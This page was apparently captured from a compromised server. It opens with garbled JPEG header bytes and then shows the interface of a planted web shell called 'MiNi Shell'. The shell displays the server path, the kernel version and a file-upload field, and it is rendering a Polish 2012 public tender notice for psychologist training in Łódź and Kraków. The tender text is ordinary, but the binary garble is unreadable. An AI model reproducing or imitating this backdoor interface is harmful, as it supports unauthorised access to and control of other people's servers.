JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/74729-N-2012.html

<p class="kh_header"><b>Łódź: Organizacja szkoleń dla psychologów w dniach 8-11 maja i 21-24 maja</b><br>
<b>Numer ogłoszenia: 74729 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy im. prof. dra med. Jerzego Nofera , ul. Św. Teresy od Dzieciątka Jezus 8, 91-348 Łódź, woj. łódzkie, tel. 042 6314871, faks 042 6314872.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja szkoleń dla psychologów w dniach 8-11 maja i 21-24 maja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na 2 części opisane poniżej.
Wykonawca może złożyć ofertę na 2 części zamówienia lub  na jedną z nich.

Część I:

Przedmiotem zamówienia jest organizacja:

3,5- dniowego szkolenia warsztatowego dla psychologów w dniach 8-11 maja 2012 roku.


W następującym zakresie:

Zapewnienie sali szkoleniowej przygotowanej do przeprowadzenia warsztatów oraz kompleksowej obsługi hotelowo-restauracyjnej obejmującej:

1.	zapewnienie 4 noclegów wraz ze śniadaniami dla maksymalnie 20 uczestników oraz dla 9 organizatorów w dniach 7-10 maja (w pokojach jednoosobowych),
2.	zapewnienie maksymalnie 20 uczestnikom warsztatów i 9 organizatorom wyżywienia: 
	-ciągłej przerwy kawowej oraz obiadu w dniach 8-11 maja 2012 roku, 
	-kolacji w dniach 7-8, 10 maja, 
	-jednej uroczystej kolacji w dniu 9 maja,

Termin realizacji: 7-11 maja 2012 roku


	Zamawiający wymaga, aby szkolenie zostało zorganizowane w hotelu (o wysokim standardzie; co najmniej 3-gwiazdkowym lub w odpowiadającym standardem hotelom co najmniej 3-gwiazdkowym w przypadku obiektów innych niż hotele), zlokalizowanym w Krakowie, w centrum miasta przy głównych trasach wjazdowych do miasta (drogach krajowych), w najbliższym sąsiedztwie Dworca Głównego,
	Zamawiający zastrzega sobie prawo do potwierdzenia ostatecznej listy gości oraz przesłania agendy szkolenia na 2 dni przed szkoleniem,
	Wykonawca zapewni dla maksymalnie 29 osób noclegi wraz ze śniadaniami w dniach 7-10 maja 2012 roku w pokojach jednoosobowych, każdy pokój będzie miał oddzielną łazienkę, śniadanie będzie miało formę szwedzkiego stołu,
	Wykonawca przyjedzie na co najmniej jedno spotkanie organizacyjne do siedziby IMP celem uzgodnienia szczegółów i zostaje zobowiązany do konsultowania szczegółów w każdym z aspektów organizacji szkolenia z osobą wskazaną do kontaktu ze strony IMP, 
	Obiekt, w którym grupa będzie zakwaterowana, będzie posiadał bezpłatne miejsca parkingowe dla organizatorów (miejsce dla max. 3 samochodów).
	Ze względów organizacyjnych Wykonawca zapewni noclegi, wyżywienie dla uczestników i organizatorów oraz salę szkoleniową i parking samochodowy na terenie jednego obiektu (wszystkie posiłki - za wyjątkiem uroczystej kolacji - będą przygotowywanie i serwowane w restauracji znajdującej się w hotelu).
	Przed salą konferencyjną będą zorganizowane dodatkowe miejsca do przeprowadzenia rejestracji uczestników (2 stoliki + co najmniej 2 krzesła).
	Szkolenie zorganizowanie zostanie w sali konferencyjnej spełniającej następujące wymagania:
	-sala szkoleniowa pomieści do 30 osób jednocześnie (miejsca siedzące przy stołach przy ustawieniu w U), w sali będzie zapewniony osobny stół prezydialny z miejscami siedzącymi dla prowadzących;
	-podczas jednego dnia zajęć (wg agendy szkolenia) uczestnicy i organizatorzy będą mieli do dyspozycji salę, w której będą mogły się odbyć zajęcia praktyczne z jogi - sala będzie miała powierzchnię zapewniającą swobodne ćwiczenie maksymalnie 20 uczestników i 3 organizatorów korzystających z rozłożonych karimat jednocześnie, ponadto organizator jest zobowiązany w ramach organizacji szkolenia zapewnić maksymalnie 23 karimaty do ćwiczeń (o wymiarach około 60x180 cm). 
	-sala będzie wyposażona w sprzęt multimedialny (rzutnik multimedialny, ekran do rzutnika, komputer) oraz system nagłośnieniowy (mikrofony, głośniki) wraz z obsługą techniczną do dyspozycji uczestników przez cały czas trwania szkolenia,
	-sala będzie klimatyzowana,
	-w oknach w sali, gdzie będą odbywać się szkolenia będą zainstalowane rolety bez względu na porę roku oraz nasłonecznienie sali,
	-sala będzie zarezerwowana dla uczestników szkolenia przez co najmniej 8 godzin w dniach 8-10 maja oraz co najmniej 4 godziny w dniu 11 maja,
	Zamawiający oczekuje od firmy elastyczności w działaniu i zastrzega sobie prawo do wprowadzania drobnych zmian w trakcie realizacji szkolenia (np. dotyczących pozostawania sal szkoleniowych w dyspozycji Zamawiającego, menu);
	Wykonawca jest zobowiązany do stawienia się w miejscu organizacji szkolenia w pierwszym dniu, co najmniej 60 minut przed rozpoczęciem szkolenia, celem dopilnowania, czy wszystkie ustalenia z hotelem zostały zapewnione,
	Wykonawca zapewni po warsztatach w dniu 9 maja dodatkową atrakcję dla uczestników 
i organizatorów szkolenia w postaci zwiedzania wraz z przewodnikiem dowolnego obiektu związanego z kulturą, sztuką lub historią, trwającego co najmniej 1 godz. Zwiedzanie zakończy uroczysta kolacja, która zostanie zorganizowana w restauracji, która pomieści jednocześnie maksymalnie 29 osób osób na jednej sali, przy jednym stole, zlokalizowanej maksymalnie 10 minut pieszo od zwiedzanego obiektu.
	Podczas uroczystej kolacji każdy z uczestników i organizatorów będzie miał możliwość wyboru z karty dowolnej przystawki, dania głównego oraz deseru.
	W trakcie każdego dnia szkolenia przygotowane zostaną: tzw. ciągła przerwa kawowa - (catering opisany poniżej) przez cały czas trwania szkolenia - tzn. w przypadku wyczerpania któregoś z artykułów obsługa hotelu (obiektu)  będzie niezwłocznie reagować i uzupełniać braki.
	Obsługa hotelowa jest zobowiązana do systematycznego sprzątania brudnych naczyń pozostawionych przez uczestników korzystających z przerwy kawowej.
	W trakcie przerw kawowych dla uczestników przygotowany zostanie catering: napoje (kawa parzona i rozpuszczalna do wyboru, 3 rodzaje herbaty, woda mineralna gazowana i niegazowana, sok plus cukier i mleko do kawy) w ilości nieograniczonej oraz ciastka różnego rodzaju w ilości po minimum 20 dag na każdego uczestnika, catering będzie przygotowany na pół godziny przez rozpoczęciem szkolenia i pozostanie wg specyfikacji do końca trwania zajęć. 
	Posiłki zostaną podane na jednakowej eleganckiej zastawie, uczestnicy będą posługiwać się sztućcami z tego samego zestawu, obrusy będą nienagannie czyste i wyprasowane, wszyscy uczestnicy i organizatorzy będą mogli zjeść obiad w tym samym czasie, restauracja zapewni miejsca siedzące przy stołach.
W trakcie przerwy obiadowej zostanie przygotowane menu złożone z dwóch dań (zupy + drugiego dania i kompotu -soku ze świeżych owoców) oraz deseru. Każdego dnia powinny być do wyboru dwa różne zestawy obiadowe - w tym jeden zestaw jarski, dania będą przyrządzane ze świeżych produktów najwyższej jakości, przygotowywane bezpośrednio przed podaniem, a Wykonawca jest zobowiązany ustalić menu z Zamawiającym, dania będą serwowane na półmiskach w formie szwedzkiego stołu (nie w postaci gotowych zestawów podawanych na talerzach każdemu z gości). Przykładowe menu obiadowe podczas jednego dnia:

Zupy:
Żurek z kiełbaską i jajkiem
Zupa-krem warzywny z groszkiem ptysiowym

Danie główne (podanie na półmiskach do wyboru):
Schab w sosie pieczeniowym
Pstrąg w sosie koperkowym

Dodatki:
Opiekane ziemniaczki, frytki, kopytka + zestaw surówek, sok-kompot z owoców

Deser:
Szarlotka podawana na ciepło


 Część II:

Przedmiotem zamówienia jest organizacja:

3,5- dniowego szkolenia warsztatowego dla psychologów w dniach 21 - 24 maja 2012 roku.


W następującym zakresie:

Zapewnienie sali szkoleniowej przygotowanej do przeprowadzenia warsztatów oraz kompleksowej obsługi hotelowo-restauracyjnej obejmującej:

1.zapewnienie 4 noclegów wraz ze śniadaniami dla maksymalnie 20 uczestników w dniach 20-23 maja (w pokojach jednoosobowych);
2.zapewnienie maksymalnie 20 uczestnikom warsztatów i 9 organizatorom wyżywienia: 
	-ciągłej przerwy kawowej oraz obiadu w dniach 21-24 maja 2012 roku, 
	-kolacji w dniach 20-21,23 maja; 
         -jednej kolacji uroczystej w dniu 22 maja;



Termin realizacji: 20-24 maja 2012 roku


	Zamawiający wymaga, aby szkolenie zorganizowane zostanie w hotelu (o standardzie co najmniej 2-gwiazdkowym lub w odpowiadającym standardem hotelom co najmniej 2-gwiazdkowym w przypadku obiektów innych niż hotele), zlokalizowanym w ścisłym centrum Łodzi przy głównych trasach wjazdowych do miasta (drogach krajowych); z możliwością dojazdu środkami komunikacji miejskiej z dworca Łódź Kaliska lub Łódź Widzew;
	Zamawiający zastrzega sobie prawo do potwierdzenia ostatecznej listy gości oraz przesłania agendy szkolenia na 2 dni przed szkoleniem;
	Wykonawca zapewni dla maksymalnie 20 osób noclegi wraz ze śniadaniami w dniach 20-23 maja 2012 roku w pokojach jednoosobowych, każdy pokój będzie miał oddzielną łazienkę, śniadanie będzie miało formę szwedzkiego stołu;
	Wykonawca przyjedzie na co najmniej jedno spotkanie organizacyjne do siedziby IMP celem uzgodnienia szczegółów i zostaje zobowiązany do konsultowania szczegółów w każdym 
z aspektów organizacji szkolenia z osobą wskazaną do kontaktu ze strony IMP;
	Wykonawca zapewni dla organizatorów jeden dodatkowy pokój w dniach 21-24 maja;
	Wykonawca zapewni bezpłatne miejsca parkingowe dla organizatorów (miejsce dla maksymalnie 4 samochodów) w odległości maksymalnie 150 m od obiektu hotelowego;
	Ze względów organizacyjnych Wykonawca zapewni noclegi, wyżywienie dla uczestników i organizatorów oraz salę szkoleniową, na terenie jednego obiektu, a wszystkie posiłki będą przygotowywanie i serwowane w restauracji znajdującej się w hotelu (obiekcie).
	Przed salą konferencyjną będą zorganizowane dodatkowe miejsca do przeprowadzenia rejestracji uczestników (2 stoliki + co najmniej 2 krzesła);
	Szkolenie zorganizowanie zostanie w sali szkoleniowej spełniającej następujące wymagania:
	-sala szkoleniowa pomieści do 30 osób jednocześnie (miejsca siedzące przy stołach przy ustawieniu w U), w sali będzie zapewniony osobny stół prezydialny z miejscami siedzącymi dla prowadzących;
	-podczas jednego dnia zajęć (wg agendy szkolenia) uczestnicy i organizatorzy będą mieli do dyspozycji salę, w której będą mogły się odbyć zajęcia praktyczne z jogi - sala będzie miała powierzchnię zapewniającą swobodne ćwiczenie maksymalnie 20 uczestników i 3 organizatorów korzystających z rozłożonych karimat jednocześnie, ponadto organizator jest zobowiązany w ramach organizacji szkolenia zapewnić maksymalnie 23 karimaty do ćwiczeń (o wymiarach około 60x180 cm); 
	-sala będzie wyposażona w sprzęt multimedialny (rzutnik multimedialny, ekran do rzutnika, komputer) oraz system nagłośnieniowy (mikrofony, głośniki) wraz z obsługą techniczną do dyspozycji uczestników przez cały czas trwania szkolenia;
	-sala będzie klimatyzowana;
	-w oknach w sali, gdzie będą odbywać się szkolenia będą zainstalowane rolety bez względu na porę roku oraz nasłonecznienie sali;
	-sala będzie zarezerwowana dla uczestników szkolenia przez co najmniej 8 godzin w dniach 21-23 maja oraz co najmniej 4 godziny w dniu 24 maja;
	Zamawiający oczekuje od firmy elastyczności w działaniu i zastrzega sobie prawo do wprowadzania drobnych zmian w trakcie realizacji szkolenia (np. dotyczących pozostawania sal szkoleniowych w dyspozycji Zamawiającego, menu);
	Wykonawca jest zobowiązany do stawienia się w miejscu organizacji szkolenia w pierwszym dniu, co najmniej 60 minut przed rozpoczęciem szkolenia, celem dopilnowania, czy wszystkie ustalenia z hotelem zostały zapewnione;
	Podczas uroczystej kolacji zostanie podane: przystawka, danie, główne i deser oraz 2 zimne przekąski (koreczki, deska serów, roladki mięsne lub podobne) oraz 3 sałatki w ilości 2 kg każda, do posiłku zostaną podane: woda, sok, kawa, herbata w ilości nieograniczonej;
	W trakcie każdego dnia szkolenia przygotowane zostaną: tzw. ciągła przerwa kawowa - (catering opisany poniżej) przez cały czas trwania szkolenia - tzn. w przypadku wyczerpania któregoś z artykułów obsługa hotelu będzie niezwłocznie reagować i uzupełniać braki;
	Obsługa hotelowa jest zobowiązana do systematycznego sprzątania brudnych naczyń pozostawionych przez uczestników korzystających z przerwy kawowej;
	W trakcie przerw kawowych dla uczestników przygotowany zostanie catering: napoje (kawa parzona i rozpuszczalna do wyboru, 3 rodzaje herbaty, woda mineralna gazowana i niegazowana, sok plus cukier i mleko do kawy) w ilości nieograniczonej oraz ciastka różnego rodzaju w ilości po minimum 20 dag na każdego uczestnika, catering będzie przygotowany na pół godziny przez rozpoczęciem szkolenia i pozostanie wg specyfikacji do końca trwania zajęć; 
Posiłki zostaną podane na jednakowej eleganckiej zastawie, uczestnicy będą posługiwać się sztućcami z tego samego zestawu, obrusy będą nienagannie czyste i wyprasowane, wszyscy uczestnicy i organizatorzy będą mogli zjeść obiad w tym samym czasie, restauracja zapewni miejsce siedzące przy stołach;
	W trakcie przerwy obiadowej zostanie przygotowane menu złożone z dwóch dań (zupy 
+ drugiego dania i kompotu -soku ze świeżych owoców) oraz deseru. Każdego dnia powinny być do wyboru dwa różne zestawy obiadowe - w tym jeden zestaw jarski, dania będą przyrządzane ze świeżych produktów najwyższej jakości, przygotowywane bezpośrednio przed podaniem, a Wykonawca jest zobowiązany ustalić menu z Zamawiającym, dania będą serwowane na półmiskach w formie szwedzkiego stołu (nie w postaci gotowych zestawów podawanych na talerzach każdemu z gości). Przykładowe menu obiadowe podczas jednego dnia:

Zupy:
Żurek z kiełbaską i jajkiem
Zupa-krem warzywny z groszkiem ptysiowym

Danie główne (podanie na półmiskach do wyboru):
Schab w sosie pieczeniowym
Pstrąg w sosie koperkowym

Dodatki:
Opiekane ziemniaczki, frytki, kopytka + zestaw surówek, sok-kompot z owoców

Deser:
Szarlotka podawana na ciepło.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy z art. 22 ust. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełnione załączniki do SIWZ (załączniki 1 - 3),
2. Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Medycyny Pracy w Łodzi, ul. Św. Teresy od Dzieciątka Jezus Nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 11:00, miejsce: Instytut Medycyny Pracy w Łodzi, ul. Św. Teresy od Dzieciątka Jezus Nr 8 w pokoju 81 - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com